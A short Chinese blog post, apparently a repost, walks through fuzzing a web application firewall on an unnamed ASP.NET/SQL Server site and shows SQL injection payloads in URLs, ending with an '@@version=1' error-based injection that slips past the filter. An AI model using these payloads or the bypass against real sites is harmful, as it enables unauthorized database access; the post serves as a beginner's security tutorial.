一个非常简单的WAF绕过。。

0x00 前言


确实是非常简单,如果是新手的话,我希望能给你带来一些思路,老鸟的话就emm...

0x01 起因


工具扫到了一个有sqlserver特性的站点

通常出现这种错误信息,说明该站点配置不当,错误信息会直接显示,也没用强制类型转换的信息,那么一般就有报错型注入了!来检测一下

却出现了WAF的信息

0x02 fuzz


遇到WAF首先得先看看是什么关键字触发了拦截请求,所以我们先进行简单的调试

http://xxxx/xxxx.aspx?xxxx=1' and --a


语法出错是很正常的,因为我们添加了and且后面没任何值,所以我们可以假设语句变成了

select xxx from xxx where xxxx=1' and --a

但我们发现其实并没有触发WAF,说明and关键字并没有在过滤的列表当中,继续尝试

http://xxxx/xxxx.aspx?xxxx=1' and 1=1 --a


竟然触发了WAF,经过多次调试,发现是and后面居然不能带数字。。这样就不会报错了

http://xxxx/xxxx.aspx?xxxx=1' and a=1 --a


那么再次尝试下原来的代码,将顺序调整,成功!

http://xxxx/xxxx.aspx?xxxx=1' and @@version=1 --a

转载于:https://blog.51cto.com/z2ppp/2061787

你可能感兴趣的:(一个非常简单的WAF绕过。。)